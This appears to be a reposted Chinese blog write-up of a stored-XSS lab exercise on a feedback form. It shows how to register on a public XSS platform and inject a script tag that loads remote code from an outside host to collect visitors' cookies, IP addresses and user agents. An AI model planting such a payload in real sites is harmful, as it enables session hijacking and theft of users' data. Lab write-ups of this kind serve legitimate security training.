xss攻击之伪造cookie

靶场地址:

http://59.63.200.79:8004/Feedback.asp在这里插入图片描述

XSS盲打

见框就插,输入进行测试 (若有长度限制则在input框中修改最大长度),点击【提交留言】按钮:
在这里插入图片描述

随后自动跳转到查看留言界面:
在这里插入图片描述

很明显插入的js代码可直接执行,分别执行了这三段代码
在这里插入图片描述

尝试刷新后仍然可执行,由此推断其为存储性XSS
在这里插入图片描述

利用XSS公开平台生成漏洞利用代码

xss公开平台:http://xsspt.com
(亦可自己本地搭建获取受害者cookie的源码)

首先注册登录:
在这里插入图片描述

创建项目:
在这里插入图片描述
在这里插入图片描述

如下是我们刚刚创建项目的项目源代码在这里插入图片描述

以及使用方式:
在这里插入图片描述

在这里,我使用该行代码插入XSS漏洞处:

<script src=http://xsspt.com/ds4vY6></script>

在这里插入图片描述
在这里插入图片描述
js恶意代码插入成功,只要访问被插入恶意代码的界面,恶意代码自动执行,并收集用户信息返回给攻击者:
(如用户cookie,用户IP地址,用户代理)

此处可以看到代码执行成功,xss恶意代码被成功引入:在这里插入图片描述

恶意代码将访问界面的用户的信息返回给攻击者
在这里插入图片描述

UML 图表

2.将xss平台信息收集代码通过js引入
1.搭建xss平台
3.访问受害网站
4.执行恶意代码盗取用户信息
5.将用户信息传回xss平台
攻击者
受害网站
xss平台
用户
发布了9 篇原创文章 · 获赞 2 · 访问量 639

猜你喜欢

转载自blog.csdn.net/Pythonicc/article/details/104076221